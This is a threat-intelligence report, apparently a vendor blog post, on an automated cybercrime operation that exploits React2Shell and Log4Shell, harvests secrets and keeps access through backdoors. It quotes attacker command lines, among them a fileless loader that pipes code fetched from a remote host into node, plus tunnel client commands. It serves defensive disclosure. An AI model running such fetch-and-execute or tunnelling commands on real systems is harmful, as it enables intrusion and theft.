Chinese Cybercrime Infrastructure Detected: Automated Exploitation & Harvesting Infrastructure

SOCRadar Threat Research Team identified automated Chinese cybercrime infrastructure that blends large-scale exploitation with structured orchestration and monetization. The operation is coordinated through a centralized backend (referred to as ‘paperclip‘) and an agent-based workflow system OpenClaw, enabling operators to manage campaigns through structured missions.

The system targets vulnerable web applications using:

• React2Shell (CVE-2025-55182, CVE-2025-66478)
• Log4Shell (CVE-2021-44228)

It performs internet-scale reconnaissance, exploits vulnerable targets, executes commands to extract sensitive data, and directly validates stolen credentials for financial gain.

Targeting Strategy

The actor uses FOFA and 360Quake for reconnaissance. FOFA is used to identify high-value organizations such as Web3 platforms, fintech services, and security vendors, while 360Quake focuses on technical fingerprinting of vulnerable services.

A notable pattern includes mass-generated FOFA accounts (e.g., fofa<random>@deltajohnsons[.]com), suggesting automated account creation to bypass API limits and sustain continuous scanning.

Exploitation and Execution

Custom Python scripts automate exploitation by executing commands such as environment variable dumps. These scripts support WAF bypass and parallelexecution, enabling scalable exploitation across hundreds of targets. The primary objective is reliable remote code execution rather than simple vulnerability detection.

Custom Scripts:

• 2.py, 3.py, 4.py, 11.py

Credential Harvesting

Following successful exploitation, the attacker extracts runtime secrets using environment variable dumps. This includes AI API keys,Stripe keys, databasecredentials, and tokens. These secrets are parsed and stored centrally, indicating a focus on immediately usable data rather than raw dumps.

Persistence and Access

The attacker deploys multiple persistence mechanisms, including Cloudflare tunnels, P2P clients, and backdoors (d2 and pl). This ensures stealthy and redundant access, avoiding reliance on a single communication channel.

Cloudflare tunnel: 

• cf-client –name sshd wss://*.trycloudflare.com/ws

P2P client:

• p2p-client client –name mayun

Backdoors:

• d2
• pl

Advanced Fileless Loader (NKN-based C2 Deployment):

The attacker utilizes a fileless execution chain to deploy a stealthy command-and-control agent:

• python3 2.py -w -c “curl https://soft-silence-*.workers.dev/ | node”

• python3 2.py -w -c “echo <base64_payload> | node”

Orchestration Layer

The infrastructure is coordinated via a backend system (‘paperclip‘) and a workflow-driven interface OpenClaw. The observed pipeline includes stages such as planning, dispatching, reconnaissance, validation, and reporting, demonstrating human-in-the-loop control over automated processes.

Observed UI shows:

• Plan → Review → Dispatch → Recon → Scan → Validate → Report

This confirms the operation is workflow-driven and operator-controlled.

Monetization

Stolen data is enriched and monetized using blockchain intelligence APIs and Stripe validation. Cryptocurrency addresses are analyzed across multiple chains, while stolen Stripe keys are tested via API calls to identify accounts with available balances. This enables immediate prioritization of high-value targets.

Crypto tracking:

• OKLink / OKX / Tatum APIs
• multi-chain wallet monitoring
• ~100K tracked addresses

Stripe validation:

Scale

Data retrieved from the backend provides a clear view into the scale and maturity of the operation:

• payload_exec_log: ~45,000 exploitation attempts
• react2shell_vulns.txt: 346 vulnerable hosts
• d2_good: 3981 hosts with d2 backdoor
• pl_good: 1393 hosts with pl backdoor
• webshell_implant_log: 900 webshell implants
• Crypto Addresses: 21,999

Notably, the high number of backdoor deployments compared to confirmed webshells suggests a preference for lightweight, script-based persistence mechanisms (d2/pl) over traditional webshell usage.

Execution telemetry is centrally logged through dedicated tables such as:

• payload_exec_log → tracks payload execution attempts
• direct_payload_log → records successful exploitation and delivery
• clip_exec_log → monitors command execution outcomes and validation status

Conclusion

This infrastructure represents a shift in cybercrime operations toward structured, automated systems that integrate exploitation, data extraction, and monetization into a unified workflow. The combination of automation and human oversight allows attackers to scale operations while maintaining precision in targetingvaluable assets. As attackers continue to adopt such models, defensive strategies must evolve to detect not only exploitation attempts but also post-exploitation behaviors and monetization activities.

How SOCRadar Can Help

The threat infrastructure described in this report was uncovered through SOCRadar’s Threat Research capabilities, combining Deep and Dark Web monitoring, exposed credential detection, and adversarial infrastructure tracking into a unified intelligence workflow.

SOCRadar users benefit from:

• Dark & Deep Web Monitoring — Early detection of harvested credentials and API keys before they are monetized
• Attack Surface Management — Continuous visibility into your internet-facing assets that actors like this actively scan via FOFA and 360Quake
• Supply Chain Intelligence — Identification of compromised third-party services and tokens circulating in criminal backends
• Threat Actor Tracking — Persistent monitoring of infrastructure patterns, C2 domains, and campaign tooling linked to known threat groups

If your organization operates in Web3, fintech, or cloud-native environments, you are a high-priority target for this class of threat actor.

Concerned your assets or credentials may already be exposed? Receive a Free Dark Web Scan:

Indicators of Compromise (IOCs)